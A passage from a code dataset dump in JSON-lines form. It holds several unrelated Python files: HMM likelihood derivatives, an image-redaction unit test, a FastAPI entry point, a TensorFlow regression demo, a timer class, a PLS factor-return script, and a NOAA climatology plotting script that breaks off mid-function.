(self.pZ[:,1] * N) - (self.pZ[:,0] * kappa)\n den_2 = np.exp(beta[0][1]) + np.exp(self.delta[1] + beta[1][1])\n num_3 = Z + N\n den_3 = den_1 * den_2\n \n for k, (start, end) in sorted(self.index.items()):\n a_i1 = (num_1[start:end].mean()/den_1) + (num_2[start:end].mean()/den_2)\n a_i2 = kappa * (num_3[start:end].mean()/den_3)\n ld = a_i1/2.0 + np.sqrt(np.square(a_i1)/4.0 + a_i2)\n \n new_ld += [ ld for _ in range(end-start) ]\n\n self.ld = np.array(new_ld)\n \n\n # DONE - deal with (T,K)\n def get_phi(self):\n\n phi = np.argmax(self.pZ, axis=1)\n self.phi = np.array([np.count_nonzero(phi == k) for k in xrange(self.K) ]) / float(len(phi))\n \n # DONE\n def model(self, kappa, beta):\n lm = self.log_model(kappa, beta)\n c = np.array([ np.log(np.arange(1, m+1)).sum()\n + np.log(np.arange(1, n+1)).sum() for m, n in zip(self.N[0], self.N[1]) ])\n return np.exp(lm - c)\n\n # DONE - deal with (T, K)\n def log_model(self, kappa, beta):\n \n N = self.N.sum(axis=0)\n lm = []\n \n lld = np.log(self.ld)\n for k in range(self.K-1):\n \n c_1K = self.ld * np.exp(self.delta[0] + beta[0][k])\n c_2K = self.ld * np.exp(self.delta[1] + beta[1][k])\n \n l = (gammaln(N + kappa) - gammaln(kappa))\n l += kappa * np.log(kappa) \n l += self.N[0] * (lld + self.delta[0] + beta[0][k])\n l += self.N[1] * (lld + self.delta[1] + beta[1][k])\n l -= (N + kappa) * (np.log(c_1K + c_2K + kappa))\n \n lm.append(l)\n return np.array(lm)\n \n\n # DONE - deal with (T, K)\n def first_drvt_log_model_kappa(self, kappa, beta):\n \n N = self.N.sum(axis=0)\n J = []\n for k in range(self.K-1):\n \n pgamma = polygamma(0, N + kappa) - polygamma(0, kappa)\n \n c_1K = self.ld * np.exp(self.delta[0] + beta[0][k])\n c_2K = self.ld * np.exp(self.delta[1] + beta[1][k])\n \n J_k = pgamma\n J_k += 1.0 + np.log(kappa)\n J_k -= np.log(c_1K + c_2K + kappa)\n J_k -= (N + kappa)/(c_1K + c_2K + kappa)\n \n J.append(J_k)\n \n return np.array(J)\n \n # DONE - deal with (T, K)\n def first_drvt_log_model_beta(self, kappa, beta):\n\n N = self.N.sum(axis=0)\n\n J = np.zeros((self.T * (self.K-1), self.N.shape[1]))\n for t in range(self.T):\n for k in range(self.K-1):\n\n if t != 0 or k != 0:\n \n c_1K = self.ld * np.exp(self.delta[0] + beta[0][k])\n c_2K = self.ld * np.exp(self.delta[1] + beta[1][k])\n c_TK = self.ld * np.exp(self.delta[t] + beta[t][k])\n\n J_b = self.N[t] - ((N + kappa)*(c_TK)/(c_1K + c_2K + kappa))\n \n J[(t*self.T)+k] = J_b\n \n return J\n\n # DONE - deal with (T, K)\n def second_drvt_log_model_kappa_kappa(self, kappa, beta):\n\n N = self.N.sum(axis=0)\n \n H = []\n for k in range(self.K-1):\n \n pgamma = polygamma(1, N + kappa) - polygamma(1, kappa)\n\n c_1K = self.ld * np.exp(self.delta[0] + beta[0][k])\n c_2K = self.ld * np.exp(self.delta[1] + beta[1][k])\n\n num = c_1K + c_2K - N\n denom = c_1K + c_2K + kappa\n \n H_kk = pgamma \n H_kk += 1.0/kappa\n H_kk -= 1.0/denom\n H_kk -= num/np.square(denom)\n\n H.append(H_kk)\n \n return np.array(H)\n\n # DONE - deal with (T, K)\n def second_drvt_log_model_beta_kappa(self, kappa, beta):\n\n TK = []\n for t in range(self.T):\n for k in range(self.K-1):\n if t != 0 or k != 0:\n TK.append((t, k))\n\n N = self.N.sum(axis=0)\n\n H = []\n for u in range(len(TK)):\n t, k = TK[u]\n c_TK = self.ld * np.exp(self.delta[t] + beta[t][k])\n\n num_1 = c_TK\n num_2 = c_TK * (N + kappa)\n den_1 = kappa\n for t_ in xrange(self.T):\n den_1 += self.ld * np.exp(self.delta[t_] + beta[t_][k])\n \n H_bk = -(num_1/den_1) + (num_2/np.square(den_1))\n \n H.append(H_bk)\n \n return np.array(H)\n\n # DONE - deal with (T, K)\n def second_drvt_log_model_beta_beta(self, kappa, beta):\n\n TK = []\n for t in range(self.T):\n for k in range(self.K-1):\n if t != 0 or k != 0:\n TK.append((t, k))\n\n N = self.N.sum(axis=0)\n H = np.zeros((len(TK), len(TK), self.N.shape[1]))\n \n for u in range(len(TK)):\n for v in range(u+1):\n\n t1, k1 = TK[u]\n t2, k2 = TK[v]\n \n if k1 == k2:\n if t1 != t2:\n \n c_TK = np.square(self.ld) * np.exp(self.delta[t1] + beta[t1][k1] + self.delta[t2] + beta[t2][k2])\n num_1 = (N + kappa) * c_TK\n den_1 = kappa\n for t_ in xrange(self.T):\n den_1 += self.ld * np.exp(self.delta[t_] + beta[t_][k1])\n \n H[u, v] = -(num_1/np.square(den_1))\n \n elif t1 == t2:\n \n c_TK = self.ld * np.exp(self.delta[t1] + beta[t1][k1])\n num_1 = (N + kappa) * c_TK\n den_1 = kappa\n for t_ in xrange(self.T):\n den_1 += self.ld * np.exp(self.delta[t_] + beta[t_][k1])\n num_2 = self.ld * np.exp(self.delta[t2] + beta[t2][k2]) - den_1\n \n H[u, v] = (num_1 * num_2)/(np.square(den_1))\n\n return H\n\n # DONE - deal with (T,K)\n def log_expected(self, theta):\n \n kappa, beta = self.get_kappa_beta(theta)\n\n log_total = 0.0\n \n lm = self.log_model(kappa, beta)\n\n for k in range(self.K-1):\n log_total += (self.pZ[:,k] * lm[k]).sum()\n \n return -log_total\n\n # DONE - deal with (T,K)\n def log_jacobian(self, theta):\n \n kappa, beta = self.get_kappa_beta(theta)\n log_total = [0.0, 0.0, 0.0, 0.0]\n \n J_k = self.first_drvt_log_model_kappa(kappa, beta)\n J_b = self.first_drvt_log_model_beta(kappa, beta)\n \n # Kappa (1 value)\n for k in range(self.K-1):\n log_total[0] += (self.pZ[:,k] * J_k[k]).sum()\n \n # Beta (k x t values)\n for t in range(self.T):\n for k in range(self.K-1):\n if t != 0 or k != 0:\n log_total[(t*2)+k] += (self.pZ[:,k] * J_b[(t*2)+k]).sum()\n \n log_total = np.array(log_total)\n \n # DEBUG\n # print \"Jacobian %s\" % -log_total\n return -log_total\n\n # DONE - deal with (T,K)\n def log_hessian(self, theta):\n\n kappa, beta = self.get_kappa_beta(theta)\n \n p = 1 + ((self.T * (self.K-1)) - 1)\n log_total = np.zeros((p,p)).tolist()\n \n # Kappa Kappa\n H_kk = self.second_drvt_log_model_kappa_kappa(kappa, beta)\n for k in range(self.K-1):\n log_total[0][0] += (self.pZ[:,k] * H_kk[k]).sum()\n\n # Beta\n TK = []\n for t in range(self.T):\n for k in range(self.K-1):\n if t != 0 or k != 0:\n TK.append((t,k))\n\n # Beta Kappa\n H_bk = self.second_drvt_log_model_beta_kappa(kappa, beta)\n for u in range(len(TK)):\n t, k = TK[u]\n d2FdBTKdK = (self.pZ[:,k] * H_bk[((t*self.T)+k)-1]).sum()\n log_total[u+1][0] += d2FdBTKdK\n log_total[0][u+1] += d2FdBTKdK\n\n \n # Beta Beta\n H_bb = self.second_drvt_log_model_beta_beta(kappa, beta)\n for u in range(len(TK)):\n for v in range(u+1):\n t1, k1 = TK[u]\n t2, k2 = TK[v]\n d2FdBTKdBTK = (self.pZ[:,k1] * H_bb[u,v]).sum()\n \n if u == v:\n log_total[u+1][v+1] += d2FdBTKdBTK\n else:\n log_total[u+1][v+1] += d2FdBTKdBTK\n log_total[v+1][u+1] += d2FdBTKdBTK\n\n log_total = np.array(log_total)\n return -log_total\n","repo_name":"ouyang-lab/JPGM-HMM","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74424213368","text":"from django.test import TestCase\n\nfrom guided_redaction.redact.classes.ImageMasker import ImageMasker\nimport numpy as np\n\nclass ImageMaskerTestCase(TestCase):\n\n def setUp(self):\n pass\n\n def test_image_masker_masks_3channel_image_with_black(self):\n image_masker = ImageMasker()\n\n cv2_image = np.zeros((200, 200, 3), np.uint8) \n cv2_image[:,:] = (0, 123, 0)\n\n num_greens = np.count_nonzero(np.all(cv2_image == (0, 123,0), axis=-1))\n num_blacks = np.count_nonzero(np.all(cv2_image == (0, 0, 0), axis=-1))\n self.assertEquals(num_greens, 40000)\n self.assertEquals(num_blacks, 0)\n\n areas_to_redact = [\n {\n 'start': (30, 40),\n 'end': (70, 80),\n },\n ]\n\n masked_image = image_masker.mask_all_regions(\n cv2_image,\n areas_to_redact,\n mask_method='black_rectangle'\n )\n\n green_pixels = np.all(masked_image == (0, 123,0), axis=-1)\n black_pixels = np.all(masked_image == (0, 0, 0), axis=-1)\n\n num_greens = np.count_nonzero(green_pixels)\n num_blacks = np.count_nonzero(black_pixels)\n\n # we supplied a box to redact that is 41x41 - the ranges are inclusive. \n self.assertEquals(num_greens, 38319)\n self.assertEquals(num_blacks, 1681)\n\n start_y = np.where(black_pixels)[0][0] # numpy coordinages are reversed, so x is 1, y is 0\n start_x = np.where(black_pixels)[1][0]\n self.assertEquals(start_x, 30)\n self.assertEquals(start_y, 40)\n\n end_y = np.where(black_pixels)[0][-1]\n end_x = np.where(black_pixels)[1][-1] \n self.assertEquals(end_x, 70)\n self.assertEquals(end_y, 80)\n","repo_name":"dcaulton/guided_redaction","sub_path":"api/guided_redaction/redact/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12929293361","text":"import uvicorn\nfrom fastapi import FastAPI\nfrom contextlib import asynccontextmanager\nfrom db_models import Base\nfrom database import engine\nfrom routers import users, items\n\ndescription = \"\"\"\nExample API to demonstrate distinct permissioned routes\n\"\"\"\n\n\n@asynccontextmanager\nasync def lifespan(app: FastAPI):\n Base.metadata.create_all(bind=engine)\n yield\n\n\napp = FastAPI(\n title='Permissioned routes example API',\n description=description,\n version=\"1.0.0\",\n docs_url=\"/v1/documentation\",\n redoc_url=\"/v1/redocs\",\n lifespan=lifespan\n)\n\napp.include_router(users.router)\napp.include_router(items.router)\n\nif __name__ == '__main__':\n uvicorn.run(app, host=\"0.0.0.0\", port=9999)\n","repo_name":"chrisK824/fastapi-rbac-example","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"9885149478","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef add_layer(inputs, in_size, out_size, activation_func):\n Weights = tf.Variable(tf.random.normal([in_size,out_size]))\n biases = tf.Variable(tf.zeros([1,out_size]) + 0.1)\n Wx_plus_biases = tf.matmul(inputs, Weights) + biases\n if activation_func is None:\n result = Wx_plus_biases\n else:\n result = activation_func(Wx_plus_biases)\n return result\n\nx_data = np.linspace(-1, 1, 100)[:, np.newaxis]\n# print(x_data)\nnoise = np.random.normal(0,0.05,x_data.shape)\n# print(noise)\ny_data = np.square(x_data) - 0.5 + noise\n\n# plt.figure()\n# plt.scatter(x_data, y_data)\n# plt.show()\n\n\nxs = tf.placeholder(tf.float32, [None, 1])\nys = tf.placeholder(tf.float32, [None, 1])\n\nl1 = add_layer(xs, 1, 10, activation_func=tf.nn.tanh)\nprediction = add_layer(l1, 10, 1, activation_func=None)\n\nloss = tf.reduce_mean(tf.square(ys - prediction))\ntrain_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for step in range(101):\n sess.run(train_step, feed_dict={xs:x_data, ys:y_data})\n if step % 20 == 0:\n print(step, sess.run(loss, feed_dict={xs:x_data, ys:y_data}))\n plt.plot(x_data, sess.run(prediction, feed_dict={xs: x_data}), 'r-')\n plt.show()\n","repo_name":"Huxn/tensorflow","sub_path":"src/add_layer_test(一般神经网络添加隐藏层demo).py","file_name":"add_layer_test(一般神经网络添加隐藏层demo).py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24362315154","text":"#!/usr/bin/python3\n\n\"\"\"\n\n timer.py\n\n COSC364 RIP Assignment\n\n Date: 02/05/2019\n\n Written by:\n - Will Cowper (81163265)\n - Jesse Sheehan (53366509)\n \n\"\"\"\n\nimport time\n\nclass Timer:\n\n def __init__(self, period, callback):\n \"\"\"\n Creates a new Timer with a period and a callback.\n \"\"\"\n self.__period = period\n self.__callback = callback\n self.__started = False\n self.__startedTime = 0\n self.__paused = False\n self.__pausedTime = 0\n self.__updateTime = 0\n\n def start(self):\n \"\"\"\n Starts the timer.\n \"\"\"\n if not self.__started:\n t = time.time()\n self.__started = True\n self.__startedTime = t\n self.__paused = False\n self.__pausedTime = 0\n self.__updateTime = t\n\n def stop(self):\n \"\"\"\n Stops the timer.\n \"\"\"\n if self.__started:\n self.__started = False\n self.__startedTime = 0\n self.__paused = False\n self.__pausedTime = 0\n self.__updateTime = 0\n\n def reset(self):\n \"\"\"\n Resets the timer.\n \"\"\"\n if self.__started:\n self.stop()\n self.start()\n\n def pause(self):\n \"\"\"\n Pauses the timer.\n \"\"\"\n if self.__started and not self.__paused:\n self.__paused = True\n self.__pausedTime = time.time() - self.__startedTime\n self.__startedTime = 0\n\n def resume(self):\n \"\"\"\n Resumes the timer.\n \"\"\"\n if self.__started and self.__paused:\n self.__startedTime = time.time() - self.__pausedTime\n self.__paused = False\n self.__pausedTime = 0\n\n def update(self):\n \"\"\"\n Updates the timer. May call its callback.\n \"\"\"\n if self.__started and not self.__paused:\n t = time.time()\n dt = t - self.__updateTime\n if dt > self.__period:\n self.__updateTime = t\n self.__callback(dt)\n \n def trigger(self):\n \"\"\"\n Forcefully call the callback.\n \"\"\"\n if self.__started and not self.__paused:\n t = time.time()\n dt = t - self.__updateTime\n self.__updateTime = t\n self.__callback(dt)\n\n def getElapsed(self):\n \"\"\"\n Returns the time elapsed in seconds.\n \"\"\"\n if self.__started:\n if self.__paused:\n return self.__pausedTime\n else:\n return time.time() - self.__startedTime\n return 0.0\n\n def isStarted(self):\n \"\"\"\n Returns True if the timer has been started.\n \n >>> t = Timer(10, None)\n >>> t.isStarted()\n False\n >>> t.start()\n >>> t.isStarted()\n True\n >>> t.stop()\n >>> t.isStarted()\n False\n \"\"\"\n return self.__started\n\n def isPaused(self):\n \"\"\"\n Returns True if the timer has been paused.\n \n >>> t = Timer(10, None)\n >>> t.isPaused()\n False\n >>> t.start()\n >>> t.isPaused()\n False\n >>> t.pause()\n >>> t.isPaused()\n True\n >>> t.resume()\n >>> t.isPaused()\n False\n >>> t.stop()\n >>> t.isPaused()\n False\n >>> t.start()\n >>> t.pause()\n >>> t.isPaused()\n True\n >>> t.stop()\n >>> t.isPaused()\n False\n \"\"\"\n return self.__paused and self.__started\n\n def __str__(self):\n \"\"\"\n Returns a string representation of the timer.\n \"\"\"\n return \"Timer \".format(self.__period, self.__started, self.__paused, self.getElapsed())\n\n def __repr__(self):\n \"\"\"\n Returns a string representation of the timer.\n \"\"\"\n return self.__str__()\n\n# run doctests\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"jpsheehan/cosc364-rip2","sub_path":"src/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27559476993","text":"import ctypes\r\nimport time\r\nimport os\r\n\r\nctypes.windll.kernel32.SetConsoleTitleW(\"View Counter\")\r\n\r\nos.system(\"cls\")\r\ni = 0\r\n\r\nwhile 0 == 0:\r\n print(\"Getting Views\")\r\n os.system(\"views.js > views\")\r\n f = open(\"views\", \"r\")\r\n views = f.read()\r\n f.close()\r\n \r\n print(\"Making Image\")\r\n os.system(\"image.bat \" + views)\r\n \r\n print(\"Uploading Img\")\r\n os.system(\"update.js\")\r\n \r\n print(\"Done! \" + str(i))\r\n print(\"60sec Timeout\")\r\n time.sleep(60)\r\n os.system(\"cls\")\r\n i+=1","repo_name":"KitKatNaomi/Neocity-View-Counter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34301249253","text":"from earth_wallpaper.utils.setWallpaper import set_wallpaper\nfrom earth_wallpaper.utils.platformInfo import PlatformInfo\nfrom earth_wallpaper import interfaces\nfrom PySide6.QtCore import QThread\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_class_name(name: str):\n for i in dir(interfaces):\n if getattr(interfaces, i).name() == name:\n return i\n\n\nclass Thread(QThread):\n\n def __init__(self, name):\n super(Thread, self).__init__()\n self.class_name = get_class_name(name)\n self.flag = True\n\n def run(self):\n logger.info(f\"启动{self.class_name}子线程\")\n x = getattr(interfaces, self.class_name)()\n if x.name() == \"本地壁纸\":\n img_path = x.run()\n set_wallpaper(img_path)\n else:\n img = x.run()\n if self.flag:\n PlatformInfo().check()\n with open(x.download_path, \"wb\") as f:\n f.write(img)\n set_wallpaper(x.download_path)\n logger.info(f\"{self.class_name}子线程运行完成\")\n\n def stop(self):\n self.flag = False\n logger.info(f\"{self.class_name}子线程被中断,等待线程结束\")\n","repo_name":"Pylogmon/earth_wallpaper","sub_path":"earth_wallpaper/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"77"} +{"seq_id":"41129101405","text":"\r\n\"\"\"\r\n由于并未达到原文中的数值,所以之后会重新检查,看看算式能否进一步提升,因此,并未写出很集成的模块。\r\n回归计算参考 : https://github.com/tirthajyoti/Machine-Learning-with-Python/blob/master/Regression/Linear_Regression_Methods.ipynb\r\n\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy import stats\r\n\r\nfrom factor_test_monthly import compute_num_months, compute_factor_return_series, compute_return_T_test, compute_5_factor_model\r\n\r\nfrom fm import process_bar\r\n\r\nimport time\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ndef forecast_combination(X, y):\r\n fc_params = []\r\n for i in range(X.shape[1]):\r\n if i == 0: # 对于常数项\r\n # result = sm.OLS(y, X[:, i]).fit()\r\n # fc_params.append(result.params[0])\r\n fc_params.append(stats.linregress(y, X[:, 1])[1])\r\n # fc_params.append(stats.linregress(X[:, 1], y)[1])\r\n else:\r\n fc_params.append(stats.linregress(y, X[:, i])[0])\r\n # fc_params.append(stats.linregress(X[:, i], y)[0])\r\n return fc_params\r\n\r\nif __name__ == \"__main__\":\r\n data = pd.read_csv('./data.csv')\r\n begin_month = 200203\r\n time_length = 190\r\n\r\n months = compute_num_months(begin_month, time_length)\r\n\r\n # 转为按时间排序\r\n data = data.sort_values(by = \"TRDMNT\")\r\n data = data.reset_index(drop = True)\r\n\r\n # 然后对于每一个时间节点,对于74个因子计算一次,得到其参数,\r\n # 在这里,每个时间对应的PCA,但在计算回报的时候应该用上一个时间点的数值\r\n for i in range(time_length):\r\n month = months[i]\r\n data_atmonth = data[data.TRDMNT == month]\r\n X = data_atmonth.iloc[:, 18:92].values\r\n # X = data_atmonth.iloc[:, 92:166].values\r\n X = np.column_stack((np.ones(X.shape[0]), X)) #先加上常数看看\r\n # y = data_atmonth.retx.values\r\n y = data_atmonth.reta.values\r\n pls_point = forecast_combination(X, y)\r\n if i == 0:\r\n pls_matrix = pls_point\r\n else:\r\n pls_matrix = np.vstack((pls_matrix, pls_point)) # 该矩阵和时间的对应关系为: 时间对应的那一行用到了下一个月的回报,\r\n # 所以应该移动\r\n\r\n T = 12\r\n dates = data.TRDMNT.tolist()\r\n data_matrix = data.iloc[:, 18:92].values\r\n # data_matrix = data.iloc[:, 92:166].values\r\n pls_data = []\r\n for i in range(int(data_matrix.shape[0])):\r\n date = dates[i]\r\n if date >= months[T]:\r\n now_pos = int((date - 200200)/100) * 12 + date%100- 3\r\n pls_params = np.sum(pls_matrix[now_pos - T:now_pos, :], axis=0) / T\r\n X = pls_params.T\r\n y = np.array([1] + data_matrix[i,:].tolist())\r\n pls_point = stats.linregress(y, X)[0]\r\n # pls_point = stats.linregress(X, y)[0]\r\n pls_data.append(pls_point)\r\n else:\r\n pls_data.append(0)\r\n process_bar(i, data_matrix.shape[0])\r\n\r\n data[\"pls\"] = pls_data\r\n new_panel = data.loc[:, ['stkid', 'TRDMNT', 'retx', 'pls']]\r\n # new_panel.to_csv('./pls.csv', mode='w', header=True)\r\n\r\n FACTOR = 'pls'\r\n begin_month = 200203 # 200203 178; 200306, 163;200406, 151;200506, 139; 200506, 139\r\n time_length = 178\r\n\r\n months = compute_num_months(begin_month, time_length)\r\n # 计算该因子对应的多空组合回报率表格\r\n result = compute_factor_return_series(new_panel, FACTOR, begin_month, time_length)\r\n\r\n print(\"Factor Name:\", FACTOR)\r\n the_return, t, Minus = compute_return_T_test(result)\r\n\r\n the_return2, t2 = compute_5_factor_model(Minus, months)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"cheng-zi-ya/Firm-Characteristics-and-Chinese-Stock-Market","sub_path":"pls.py","file_name":"pls.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"77"} +{"seq_id":"2042494878","text":"\n# =============================================================================\n# climoDL.py \n#\n# Author: mdgrossi\n# Modified: Nov 1, 2023\n#\n# This script retrieves NOAA CO-OPS observational data, both atmospheric and\n# oceanic, for the specified station. If historical data already exists\n# locally, it is updated with the most recently available observations.\n#\n# TO EXECUTE:\n# python climoDL.py -s \"Virginia Key, FL\" -i \"8723214\" -u \"english\" -t \"lst\" -d \"MHHW\" --hr 3 --day 2 \n#\n# =============================================================================\n\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport plotly.io as pio\nimport argparse\nimport os\nimport numpy as np\nimport pandas as pd\nfrom pyclimo import Data\nfrom noaa_coops import Station\nfrom scipy.optimize import curve_fit\n\n# -----------------------------------------------------------------------------\n# FUNCTIONS\ndef parse_args():\n \"\"\"Parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(description='Function control parameters.',\n prog='climoDL',\n usage='%(prog)s [arguments]')\n parser.add_argument('-s', '--station', metavar='station', type=str,\n help='Desired name of station. Used for saving data.',\n default=None)\n parser.add_argument('-i', '--id', metavar='stationid', type=str,\n help='Tide station number from which to retrieve data.',\n default=None)\n parser.add_argument('-o', '--outdir', metavar='outdir', type=str,\n help='Directory to save data to.',\n default=None)\n parser.add_argument('-u', '--units', metavar='units', type=str,\n help='Data units, either \"metric\" or \"english\".',\n default='english')\n parser.add_argument('-t', '--timezone', metavar='timezone', type=str,\n help='Timezone, either \"gmt\", \"lst\", or \"lst_ldt\".',\n default='lst')\n parser.add_argument('-d', '--datum', metavar='datum', type=str,\n help='Tidal datum for water level data. Options: '+\n '\"STND\", \"MHHW\", \"MHW\", \"MTL\", \"MSL\", \"MLW\", '+\n '\"MLLW\", \"NAVD\"',\n default='MHHW')\n parser.add_argument('--hr', metavar='hr_threshold', type=int,\n help='Max number of hours of data that can be missing.',\n default=3)\n parser.add_argument('--day', metavar='day_threshold', type=int,\n help='Max number of days of data that can be missing.',\n default=2)\n parser.add_argument('-r', '--redownload', action='store_true',\n help='Force redownload of historical data.')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='Print statuses to screen.')\n return parser.parse_args()\n\ndef ploy_fit(data, degree=5, print_coefs=False, plot=False):\n \"\"\"Fit polynomial curve to data\"\"\"\n # Fit curve to data\n y = data.values\n x = np.arange(0, len(y))\n coef = np.polyfit(x, y, degree)\n polyfun = np.poly1d(coef)\n if print_coefs:\n print(f'Coefficients: {coef}')\n if plot:\n fig, ax = plt.subplots(1, 1, figsize=(12,5))\n ax.plot(data, label=data.name)\n ax.plot(polyfun(x), color='red', label=f'{degree}D Polynomial')\n ax.legend(loc='best')\n plt.show()\n else:\n return polyfun(x)\n\ndef cos_fit(data, plot=False):\n \"\"\"Fit cosine curve to data\"\"\"\n X = np.arange(0, len(data))/len(data)\n\n # Initial parameter values\n guess_freq = 1\n guess_amplitude = 3*np.std(data)/(2**0.5)\n guess_phase = 0\n guess_offset = np.mean(data)\n p0 = [guess_freq, guess_amplitude,\n guess_phase, guess_offset]\n\n # Function to fit\n def my_cos(x, freq, amplitude, phase, offset):\n return np.cos(x * freq + phase) * amplitude + offset\n\n # Fit curve to data\n fit = curve_fit(my_cos, X, data, p0=p0)\n\n if plot:\n fig, ax = plt.subplots(1, 1, figsize=(12,5))\n\n ax.plot(data, label=data.name)\n ax.plot(fit, color='red', label=f'Cosine fit')\n\n ax.legend(loc='best')\n plt.show()\n else:\n return my_cos(np.array(X), *fit[0])\n\ndef daily_climo(data, var, station, stationid, first_time, last_time,\n scheme='mg',show=False):\n \"\"\"Create a daily climatology plot for environmental variable 'var'\n from 'data'.\n \n Inputs:\n data: dict, climatological stats dictionary from Data class object\n var: str, one of the available environmental variables in 'data'\n station: str, name of CO-OPS station to include in plot title\n stationid: int, CO-OPS station ID number to include in plot title\n first_time: timestamp of oldest observation to include in plot title\n last_time: timestamp of latest observation to include in plot title\n scheme: str, either 'mg' or 'bm' specifying whether to use M. Grossi's\n color scheme or B. McNoldy's\n show: Bool, display the plot to screen instead of saving to file\n \"\"\"\n\n # Dates for x axis\n xdates = pd.date_range(start='2020-01-01',end='2020-12-31', freq='1D')\n df = data[var]\n \n # Color dictionary\n colors = dict(\n mg=dict({\n 'Record High Year': 'white',\n 'Record High': 'orange',\n 'Average High': 'red',\n 'Daily Average': 'grey',\n 'Average Low': 'purple',\n 'Record Low': 'white'}),\n bm=dict({\n 'Record High Year': 'white',\n 'Record High': 'orange',\n 'Average High': 'red',\n 'Daily Average': 'grey',\n 'Average Low': 'purple',\n 'Record Low': 'white'} \n ))\n \n # Create figure\n fig = go.Figure()\n\n # Record highs\n # High records this year\n thisYear = pd.to_datetime('today').year\n highRecords = df.loc[df['Record High Year']==thisYear, 'Record High']\n highRecords.index = pd.to_datetime(highRecords.index+'-2020')\n fig.add_trace(\n go.Scatter(\n x=highRecords.index, y=highRecords.values,\n name=f'{pd.to_datetime(\"today\").year} Record'.upper(),\n mode='markers',\n marker=dict(size=6, color='white'),\n hoverinfo='none'\n ))\n fig.add_trace(\n go.Scatter(\n x=xdates, y=df['Record High'],\n name='Record High'.upper(),\n mode='markers',\n marker=dict(size=3, color='orange')\n ))\n # Average highs\n fig.add_trace(\n go.Scatter(\n x=xdates, y=cos_fit(df['Average High']).round(1),\n name='Average High'.upper(),\n marker=dict(size=3, color='red')\n ))\n # Daily average\n fig.add_trace(\n go.Scatter(\n x=xdates, y=cos_fit(df['Daily Average']).round(1),\n name='Daily Average'.upper(),\n marker=dict(size=3, color='grey')\n ))\n # Average lows\n fig.add_trace(\n go.Scatter(\n x=xdates,\n y=cos_fit(df['Average Low']).round(1),\n name='Average Low'.upper(),\n marker=dict(size=3, color='purple')\n ))\n # Record lows\n fig.add_trace(\n go.Scatter(\n x=xdates, y=df['Record Low'],\n name='Record Low'.upper(),\n mode='markers',\n marker=dict(size=3, color='white')\n ))\n # Hover box\n fig.update_traces(\n # mode = 'markers', \n hoverlabel = dict(bordercolor='white')\n )\n # Plot settings\n fig.update_layout(\n template='plotly_dark',\n # paper_bgcolor='rgba(0,0,0,0)',\n # plot_bgcolor='rgba(0,0,0,0)',\n height=600, width=1000,\n title=dict(text=f'Daily {var} Climatology for {station}'.upper()+\n '
NOAA CO-OPS Site {}, {} - {}'.format(\n stationid,\n first_time.strftime('%m/%d/%Y'),\n last_time.strftime('%m/%d/%Y')),\n font=dict(size=20,\n # family='PT Sans Narrow'\n )),\n # yaxis = dict(title=f'{var} ({vk.units[var]})'.upper()),\n xaxis = dict(showgrid=False, showspikes=True,\n dtick='M1', tickformat='%b %d'),\n hovermode='x unified',\n legend=dict(itemsizing='constant'),\n hoverlabel=dict(font_size=12,\n # font_family=\"Rockwell\"\n )\n )\n if show:\n fig.show()\n else:\n return fig\n\ndef monthly_climo(data, var, station, stationid, first_time, last_time,\n scheme='mg', show=False):\n \"\"\"Create a monthly climatology plot for environmental variable 'var'\n from 'data'.\n \n Inputs:\n data: dict, climatological stats dictionary from Data class object\n var: str, one of the available environmental variables in 'data'\n station: str, name of CO-OPS station to include in plot title\n stationid: int, CO-OPS station ID number to include in plot title\n first_time: timestamp of oldest observation to include in plot title\n last_time: timestamp of latest observation to include in plot title\n scheme: str, either 'mg' or 'bm' specifying whether to use M. Grossi's\n color scheme or B. McNoldy's\n show: Bool, display the plot to screen instead of saving to file\n \"\"\"\n\n # Dates for x axis\n xdates = pd.date_range(start='2020-01-01',end='2020-12-31', freq='MS')\n df = data[var]\n \n # Color dictionary\n colors = dict(\n mg=dict({\n 'Record High Year': 'white',\n 'Record High': 'orange',\n 'Average High': 'red',\n 'Monthly Average': 'grey',\n 'Average Low': 'purple',\n 'Record Low': 'white'}),\n bm=dict({\n 'Record High Year': 'white',\n 'Record High': 'orange',\n 'Average High': 'red',\n 'Monthly Average': 'grey',\n 'Average Low': 'purple',\n 'Record Low': 'white'} \n ))\n \n # Create figure\n fig = go.Figure()\n\n # Record highs\n # High records this year\n thisYear = pd.to_datetime('today').year\n high_records = df.loc[df['Record High Year']==thisYear, 'Record High']\n high_records.index = pd.to_datetime(high_records.index+'-2020')\n fig.add_trace(\n 